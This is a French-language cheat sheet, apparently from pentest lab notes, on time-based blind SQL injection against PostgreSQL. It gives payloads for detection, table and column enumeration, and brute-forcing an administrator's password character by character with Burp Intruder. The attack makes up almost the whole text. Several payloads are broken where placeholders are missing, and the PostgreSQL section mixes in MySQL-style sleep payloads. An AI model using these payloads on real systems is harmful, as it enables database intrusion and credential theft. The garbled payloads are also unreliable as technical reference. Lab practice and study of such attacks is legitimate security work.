## Exemple d'exploitation sur PostgreSQL
### Détection
```sql
'||pg_sleep(3)||'
'XOR(if(now()=sysdate(),sleep(10),0))OR'
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
```
### Enumeration des tables
```sql
'||(SELECT pg_sleep(3) FROM LIMIT 1)||'
délais de 3 sec pour table users
```
### Enumeration des colonnes
```sql
'||(SELECT pg_sleep(3)|| FROM users LIMIT 1)||'
délai de 3 secondes pour colonnes username et password
```
### Recherche utilisateur administrator
```sql
'||(SELECT pg_sleep(3)||username||password FROM users WHERE username='administrator')||'
```
{% hint style="info" %}
Pour les étapes suivantes, il va vous falloir modifier quelques paramètres dans burp intruder:
* Créer un nouveau pool (Pas de multithread)
* Ajouter la colonne temps de réponse
{% endhint %}
### Déterminer le nombre de caractères dans le mot de passe
```sql
'||(SELECT pg_sleep(3) FROM users WHERE username='administrator' AND LENGTH(password)=)||'
```
### Bruteforce du mot de passe
```sql
'||(SELECT pg_sleep(3) FROM users WHERE username='administrator' AND SUBSTR(password,,1)='')||'
```
{% hint style="info" %}
Avec Burp Suite, aller dans intruder, sélectionner les zones \ et \ puis utiliser l'attaque Cluster Bomb.
Payload 1: numéros de 1 à la taille découverte plus tôt
Payload 2: bruteforce
Dans les paramètres, utiliser Grep-Match pour matcher la zone qui change en fonction du true ou false afin de pouvoir filtrer plus facilemen le résultat final.
{% endhint %}
